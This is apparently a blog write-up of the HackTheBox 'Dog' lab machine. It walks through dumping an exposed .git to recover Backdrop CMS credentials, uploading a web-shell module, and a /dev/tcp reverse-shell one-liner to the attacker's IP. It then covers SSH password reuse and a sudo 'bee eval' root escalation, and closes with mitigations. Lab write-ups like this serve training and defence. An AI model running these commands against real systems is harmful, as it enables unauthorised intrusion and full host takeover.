Post

Dog

Writeup for HackTheBox Dog machine

Dog

Executive Summary

This report details the security assessment of the HackTheBox machine “Dog” (Linux). The attack chain is as follows:

  • Exposed .git → Credential Disclosure — Directory brute-forcing reveals .git is publicly accessible. Use GitDumper to reconstruct the repo, recovering admin credentials tiffany@dog.htb:BackDropJ2024DS2024 from config files.
  • Module Upload → RCE — Authenticate to Backdrop CMS admin panel. Upload a custom .tar.gz module containing a PHP web shell. Reverse shell as www-data.
  • Credential Reuse → SSH — The CMS password is reused for SSH user johncusack. SSH in as johncusack.
  • bee eval → Root Shelljohncusack has NOPASSWD sudo for /usr/local/bin/bee. Run bee eval 'system("/bin/bash");' to spawn a root shell.

error loading image

Reconnaissance

Connectivity Check

We start by verifying connectivity to the target host (IP: 10.10.11.58) using a simple ping test.

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~]
└─$ ping -c 4 10.10.11.58
PING 10.10.11.58 (10.10.11.58) 56(84) bytes of data.
64 bytes from 10.10.11.58: icmp_seq=1 ttl=63 time=309 ms
64 bytes from 10.10.11.58: icmp_seq=2 ttl=63 time=242 ms
64 bytes from 10.10.11.58: icmp_seq=3 ttl=63 time=240 ms

--- 10.10.11.58 ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3003ms
rtt min/avg/max/mdev = 240.227/263.714/309.167/32.146 ms

Port Scanning (Nmap)

We perform a service version and default script scan using Nmap to identify active network ports.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sC 10.10.11.58
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-09 00:04 PKT
Nmap scan report for 10.10.11.58
Host is up (0.70s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE    VERSION
22/tcp open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  tcpwrapped
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.27 seconds

The Nmap scan reveals two active services:

  • Port 22: Running OpenSSH 8.2p1 on Ubuntu Linux.
  • Port 80: Running an Apache 2.4.41 web server hosting a site built on Backdrop CMS.

Web Application Enumeration & Information Disclosure

Web Interface Analysis

Navigating to port 80 reveals the default landing page of the Backdrop CMS instance.

error loading image

Exposed Git Repository

During directory brute-forcing, we discover that the .git version control directory is exposed and publicly accessible at http://10.10.11.58/.git/.

error loading image

We use gitdumper.sh (from the GitTools suite) to reconstruct the remote repository locally.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
┌──(kali㉿kali)-[~]
└─$ ./gitdumper.sh http://10.10.11.58/.git/ extracted_repo
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating extracted_repo/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[-] Downloaded: /refs/wip/index/refs/heads/master
[-] Downloaded: /refs/wip/wtree/refs/heads/master
[+] Downloaded: objects/82/04779c764abd4c9d8d95038b6d22b6a7515afa
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/92/62bdafa2521035e3128f0956c48d279d389ea2
[+] Downloaded: objects/d1/59169d1050894d3ea3b98e1c965c4058208fe1
[+] Downloaded: objects/d9/3d66b3bdc7ffa2dbf42b1fcfe20f62df15cec0
[+] Downloaded: objects/d6/dda33ea64287ab76f6a9b4404e9e04dbf67b7b
[+] Downloaded: objects/c9/9fe269d56a8d1e08bd389e7a032ef2f7905cad
[+] Downloaded: objects/0e/3f55a9f2854d40d5ddc4aca36ae21f6ea489f0
[+] Downloaded: objects/f8/3230fa2cf180e5b75334dd677e1b5d4d31123b
[+] Downloaded: objects/27/1227dab979723b23bc53f3125966f4382a7803
[+] Downloaded: objects/51/44053b7a821d02460db2e902007a20004dfa16
[+] Downloaded: objects/d7/9f5db75c47c00c9a73ec324145218410e17f00
[+] Downloaded: objects/5f/2f486f1a71b32f07a060e1e731cfe02e047ed0
[+] Downloaded: objects/e5/7d5ee706906f1338f3f9471545b9d64d95b1d7
[+] Downloaded: objects/b4/79e353d20c0790a09d870de7065cd56d5c3912
[+] Downloaded: objects/25/b58c3ec85f491c2ecf6c71e42f0013f2952c6d
[+] Downloaded: objects/6f/b431954b953652923b5fa2ef34ed1a9912ccdc
[+] Downloaded: objects/95/8808ae345f60fc9347ac9d4545445e5cfdb075
[+] Downloaded: objects/34/0ad8c62aed3b0d872f9df815dcba35a98f3cb8
[+] Downloaded: objects/12/cb45ac9837cf3e3c2602acdc954e1b69dedae8
[+] Downloaded: objects/ce/71c9c586dd0f608ec0aef8be44a59ee663293f
[+] Downloaded: objects/1c/3c8947a55f78fc760e480e599d0a380f07a0c8

After downloading all accessible Git objects and index structures, we examine the reconstructed workspace directory:

1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ cd dog

┌──(kali㉿kali)-[~extracted_repo/]
└─$ ls
core/  files/  index.php*  layouts/  LICENSE.txt*  README.md*  robots.txt*  settings.php*  sites/  themes/

We search the Git commit logs and active configuration databases for sensitive strings and credentials:

1
2
3
4
5
┌──(kali㉿kali)-[~extracted_repo/]
└─$ ls | grep "@dog"
.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <dog@dog.htb> 1738963331 +0000	commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "tiffany@dog.htb"

Inspecting the configuration database files and settings.php reveals the credentials for the CMS user:

  • Username: tiffany@dog.htb
  • Password: BackDropJ2024DS2024

Exploitation: Authenticated Backdrop CMS RCE

Accessing the CMS Dashboard

Using the extracted credentials, we authenticate to the Backdrop CMS administrator control panel at http://10.10.11.58/?q=user/login.

error loading image

Remote Code Execution (RCE) via Module Upload

By default, Backdrop CMS administrators have permission to perform manual installation of custom modules (/admin/installer/manual or ?q=admin/modules/install). An attacker can abuse this feature by packaging a malicious PHP web shell as a custom CMS module to trigger Remote Code Execution (RCE).

We utilize this authenticated RCE script (dog-rce.py) to generate a packaged shell module:

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ python3 dog-rce.py http://10.10.11.58/
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58//admin/modules/install and upload shell.zip for Manual Installation.
Your shell address: http://10.10.11.58//modules/shell/shell.php

Backdrop CMS manual installation rejects ZIP archives but permits .tar.gz compressed archives. We extract the generated ZIP payload and repackage the module files using tar:

1
2
3
4
5
┌──(kali㉿kali)-[~]
└─$ unzip shell.zip -d temp_dir && tar -czf shell.tar.gz -C temp_dir . && rm -rf temp_dir
Archive:  shell.zip
 extracting: temp_dir/shell/shell.info  
 extracting: temp_dir/shell/shell.php

We navigate to the module upload page (http://10.10.11.58/?q=admin/modules/install) and submit the shell.tar.gz file:

error loading image

The CMS successfully extracts and installs our custom payload module:

error loading image

After confirming the installation, the module path becomes accessible:

error loading image

Spawning a Reverse Shell

We access the installed module at http://10.10.11.58/modules/shell/shell.php, set up a Netcat listener on our machine, and execute a reverse shell payload:

error loading image

In the web shell input field, we execute the shell command:

1
sh -i >& /dev/tcp/10.10.16.117/4444 0>&1

Our local listener intercepts the shell, granting us interactive access as the www-data web server user:

1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.58 46658
www-data@dog:/var/www/html/modules/shell$ ls
shell.info  shell.php

User Flag Access via Credential Reuse

SSH Access

We check for credential reuse by attempting to connect to the SSH service using the Backdrop CMS password (BackDropJ2024DS2024) targeting the system user johncusack:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~]
└─$ ssh johncusack@10.10.11.58
The authenticity of host '10.10.11.58 (10.10.11.58)' can't be established.
ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.58' (ED25519) to the list of known hosts.
johncusack@10.10.11.58's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 09 Mar 2025 07:44:23 AM UTC

  System load:           0.02
  Usage of /:            61.2% of 6.32GB
  Memory usage:          27%
  Swap usage:            0%
  Processes:             265
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.58
  IPv6 address for eth0: dead:beef::250:56ff:fe94:43d8


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


johncusack@dog:~$ cat user.txt
1a0d----------------------------

The credential reuse check succeeds, allowing us to read the user flag user.txt.

Privilege Escalation

Sudo Rights Enumeration

We inspect the sudo privileges assigned to the johncusack account using sudo -l.

1
2
3
4
5
6
7
johncusack@dog:~$ sudo -l
[sudo] password for johncusack: 
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

We have permission to run /usr/local/bin/bee as any user with sudo privileges and no password.

Root Shell Hijack

bee is the command-line interface utility for Backdrop CMS. It includes an eval command that evaluates raw PHP code within the Backdrop bootstrap context. Since we can run bee with root privileges via sudo, we execute a PHP system call to drop into a root bash shell.

1
2
3
4
johncusack@dog:/home/jobert$ cd /var/www/html
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee eval 'system("/bin/bash");'
root@dog:/var/www/html# cat /root/root.txt
ac65---------------------------------------

We retrieve the root flag successfully from /root/root.txt.

Mitigations & Security Recommendations

1. Restrict Version Control Access

  • Secure Web Root: Remove or restrict access to administrative files and version control metadata (such as .git directories) in public web directories. Exposing .git exposes repository logs, configurations, source code, and potential hardcoded credentials.
  • Access Control Configuration: Configure the Apache web server configuration (.htaccess or apache2.conf) to explicitly deny requests targeting hidden directories:
    1
    2
    3
    
    <DirectoryMatch "/\.git">
        Require all denied
    </DirectoryMatch>
    

2. Secure Module Installation Policies in CMS

  • Disable Manual Module Uploads: Configure Backdrop CMS to restrict manual module installations by web users. Setting allow_failed_uploads or modifying module installation permissions prevents directory writes for unauthorized PHP code execution.
  • File System Permissions: Make the CMS module directory (/var/www/html/modules) read-only for the web server user (www-data), allowing updates and installs only via offline command-line scripts or administrative tasks.

3. Enforce Password Complexity and Avoid Reuse

  • Prevent Password Reuse: Ensure passwords for system services (such as SSH) differ from passwords utilized in web application frameworks (such as Backdrop CMS).
  • Enforce MFA: Implement Multi-Factor Authentication (MFA) for SSH access and administrative CMS panels.

4. Apply Least Privilege Sudo Rules

  • Restrict CLI Evaluation Privileges: Sudo configurations must avoid granting root permissions to scripts or utilities (like /usr/local/bin/bee) that support arbitrary code evaluation, command Execution, or file system writes, as these allow trivial bypasses.
  • Audit Sudo DACLs: Ensure only highly restricted binary commands lacking native shell escape options are configured in /etc/sudoers.
This post is licensed under CC BY 4.0 by the author.